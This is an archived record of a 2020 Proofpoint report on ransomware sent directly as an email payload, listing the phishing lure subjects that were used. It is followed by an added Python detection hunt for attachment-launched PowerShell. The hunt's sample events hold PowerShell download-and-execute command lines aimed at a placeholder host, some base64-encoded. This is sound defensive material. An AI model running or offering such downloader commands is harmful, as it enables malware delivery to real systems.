{
	"id": "6cd10e29-3f09-4d77-8ba2-8e3cf9807b48",
	"created_at": "2026-04-06T00:11:09.534763Z",
	"updated_at": "2026-04-10T03:21:51.562395Z",
	"deleted_at": null,
	"sha1_hash": "e9912122ce4fc111cf3e3911f430db50c2313dd8",
	"title": "Ransomware Families Reemerge: Avaddon \u0026 More | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1114664,
	"plain_text": "Ransomware Families Reemerge: Avaddon \u0026 More | Proofpoint US\r\nBy Sherrod DeGrippo and the Proofpoint Threat Research Team, June 25, 2020\r\nPublished: 2020-06-25 · Archived: 2026-04-05 18:57:12 UTC\r\nIn the past month, Proofpoint researchers have observed a slight increase in email-based ransomware attacks that use ransomware as the first-stage payload. This is notable because for the past year or more attackers have used downloaders as the first-stage payload, which then deliver ransomware as a second- or later-stage payload. A small increase in the amount of ransomware sent as a first-stage payload via email campaigns may herald the return of the large ransomware campaigns we saw in 2018.\r\nThese attacks have featured many different families of ransomware and have targeted numerous industries in the United States, France, Germany, Greece, and Italy. They often use native-language lures and messages.\r\nRansomware families we’ve seen as first-stage payloads include, among others:\r\nAvaddon (a new family)\r\nBuran (named for the Russian space shuttle)\r\nDarkgate\r\nPhiladelphia (previously seen by Proofpoint in 2017)\r\nMr. Robot\r\nRanion\r\nEach of these ransomware families encrypts the victim's files and holds them for ransom.\r\nDaily volumes ranged from one to as many as 350,000 messages per campaign, and over one million messages between June 4 and 10, 2020 carried Avaddon ransomware. We’ve seen a variety of themes in these ransomware messages, including some that exploit COVID-19, and numerous industries were targeted. These verticals include education and manufacturing, followed by transportation, entertainment, technology, healthcare, and telecommunications.\r\nBelow are Avaddon, Mr. Robot, and Philadelphia examples:\r\nAvaddon\r\nAvaddon, a newer ransomware that has targeted U.S. organizations, is notable because it has its own branding and is often part of large-scale campaigns. 
Over one million messages with Avaddon as the payload were sent June 4-10, 2020, and over 750,000 messages were sent on June 6, 2020 alone. These campaigns were primarily sent to manufacturing, education, media, and entertainment organizations. The June 4, 2020 Avaddon ransomware campaign focused almost exclusively on transportation companies and school districts.\r\nAvaddon is an example of “ransomware-as-a-service” (RaaS), where threat actors pay others for the use of the ransomware rather than building the ransomware and infrastructure themselves.\r\nhttps://www.proofpoint.com/us/blog/security-briefs/ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more\r\nPage 1 of 6\r\nRecent Avaddon ransomware messages featured subject lines like:\r\n“Do you know him?”\r\n“Our old picture”\r\n“Photo for you”\r\n“Do you like my photo?”\r\n“Is this you?”\r\n“Your new photo?”\r\n“I like this photo”\r\nWhen opened, the included attachment downloads Avaddon using PowerShell. Once Avaddon runs, it shows the ransom message in Figure 1 and later demands an $800 payment in bitcoin via Tor. The Avaddon attackers also provide 24/7 support and resources on purchasing bitcoin, testing files for decryption, and other obstacles that may hinder victims from paying the ransom.\r\nFigure 1 Avaddon Infection Message\r\nMr. Robot\r\nThis Mr. Robot ransomware attack used a COVID-19 lure to persuade targeted users to click. Between May 19 and June 1, 2020, a series of Mr. Robot campaigns targeted U.S. 
entertainment, manufacturing, and construction organizations.\r\nRecipients of these campaigns are sent messages claiming to be from “Departament (sic) of health”, “Departament (sic) of health \u0026 human services”, “Health Service”, and “Health Care” with subject lines like:\r\nYour COVID19 results are ready / 85108\r\nYour COVID19 results are ready # 85513\r\nYour COVID_19 results # 99846\r\nView your COVID19 result # 99803\r\nhuman immunodeficiency virus analysis # 93545\r\nCOVID19 virus test result / 61043\r\nCOVID19 virus result / 64745\r\nCOVID19 virus analysis # 83273\r\nCheck your COVID_19 test # 65619\r\nYour COVID_19 Results No 80420\r\nThe recipient is encouraged to click a link in the message as shown in Figure 2. If clicked, Mr. Robot ransomware installs, and a $100 payment demand appears.\r\nFigure 2 Mr. Robot COVID-19 Lure\r\nPhiladelphia\r\nAfter a nearly three-year hiatus, Philadelphia ransomware has returned with a campaign primarily targeting manufacturing and food and beverage companies in Germany with German-language lures (Figure 3).\r\nThese messages claim to come from “Federal Germany Government” and use the flag and insignia of the Federal Republic of Germany, along with a subject that states: “Die Entscheidung, Ihr Unternehmen aufgrund von Covid-19 zu schließen” (translated: “The decision to close your company due to Covid-19”). 
The recipient is encouraged to click the link, which installs Philadelphia as a first-stage payload and shows a ransom message demanding (in English) a payment of 200 euros, as shown in Figure 4.\r\nFigure 3 Philadelphia German Lure\r\nFigure 4 Philadelphia Ransom Note\r\nThis recent emergence of ransomware as an initial payload is unexpected after such a long, relatively quiet period. The change in tactics could be an indicator that threat actors are returning to ransomware and using it with new lures. Ransomware payloads sent as the first stage in email by a variety of actors have not been seen in significant volumes since 2018. While these volumes are still comparatively small, this change is noteworthy. The full significance of this shift isn’t yet clear; what is clear is that the threat landscape is changing rapidly, and defenders should continue to expect the unexpected.\r\nSource: https://www.proofpoint.com/us/blog/security-briefs/ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/security-briefs/ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more"
	],
	"report_names": [
		"ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more"
	],
	"threat_actors": [],
	"ts_created_at": 1775434269,
	"ts_updated_at": 1775791311,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e9912122ce4fc111cf3e3911f430db50c2313dd8.pdf",
		"text": "https://archive.orkl.eu/e9912122ce4fc111cf3e3911f430db50c2313dd8.txt",
		"img": "https://archive.orkl.eu/e9912122ce4fc111cf3e3911f430db50c2313dd8.jpg"
	}
}
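Detection hunt for the Avaddon delivery chain described in the record above (an email attachment that launches PowerShell to download the payload), as an added example that is not Proofpoint's code or data. The page does not say what the attachment type was or what the PowerShell command line looked like, so the attachment-host parent list, the download-primitive patterns, and the Sysmon-style sample events below are all assumptions constructed for illustration. The rule also decodes `-EncodedCommand` blobs, since a base64 launcher would otherwise hide the download primitive from a plain string match.

```python
# Added example: hunt for attachment-spawned PowerShell downloaders in
# process-creation telemetry. Not Proofpoint code. Parent names, patterns and
# sample events are assumptions constructed for illustration.
import base64
import re

# Processes that typically host an email attachment and end up as the parent
# of the PowerShell launcher (assumption; tune to the environment).
ATTACHMENT_PARENTS = {
    "wscript.exe", "cscript.exe", "mshta.exe", "winword.exe",
    "excel.exe", "outlook.exe", "cmd.exe",
}

# Command-line fragments that fetch or execute remote content.
DOWNLOAD_PRIMITIVES = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
    r"invoke-expression|start-bitstransfer|net\.webclient|https?://)",
    re.IGNORECASE,
)

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def basename(path):
    """Last path component, lower-cased, accepting / or \\ separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Classify one Sysmon-style process-creation event as (suspicious, reasons).

    Fires only when BOTH hold: the parent is an attachment host and the command
    line (after decoding -enc) contains a download primitive. Requiring both
    keeps management agents that legitimately download files out of the alert.
    """
    reasons = []
    if basename(event["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False, reasons
    parent = basename(event["ParentImage"])
    parent_hit = parent in ATTACHMENT_PARENTS
    if parent_hit:
        reasons.append("parent is attachment host: " + parent)
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command decoded")
        cmd = cmd + " " + decoded  # match on the decoded script as well
    m = DOWNLOAD_PRIMITIVES.search(cmd)
    if m:
        reasons.append("download primitive: " + m.group(1))
    return parent_hit and m is not None, reasons


def hunt(events):
    """Return [(index, reasons)] for events that score as suspicious."""
    return [(i, score_event(ev)[1]) for i, ev in enumerate(events) if score_event(ev)[0]]


def _enc(script):
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    {   # attachment script host -> PowerShell with an inline downloader
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object "
                       "Net.WebClient).DownloadString('http://example.invalid/p')\"",
    },
    {   # interactive admin use: benign parent, no download primitive
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-Process | Sort-Object CPU",
    },
    {   # Office document -> PowerShell, downloader hidden behind -enc
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -enc " + _enc(
            "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.exe','a.exe')"),
    },
    {   # management agent pulling a file: download primitive, but the parent is
        # not an attachment host, so this rule does not flag it
        "ParentImage": r"C:\Windows\System32\services.exe",
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": "pwsh -File C:\\ops\\sync.ps1 -Uri https://updates.example.invalid/",
    },
]

if __name__ == "__main__":
    for idx, why in hunt(SAMPLE_EVENTS):
        print(idx, basename(SAMPLE_EVENTS[idx]["ParentImage"]), "; ".join(why))
```

Running the block flags events 0 and 2 and leaves the explorer.exe and services.exe launches alone. The two-condition design is a trade-off: a chain that reaches PowerShell through a parent not in `ATTACHMENT_PARENTS` (for example an intermediate process the attachment spawned) would be missed, so in production the parent check is better expressed as an ancestry walk over the process tree than as a single parent-name lookup.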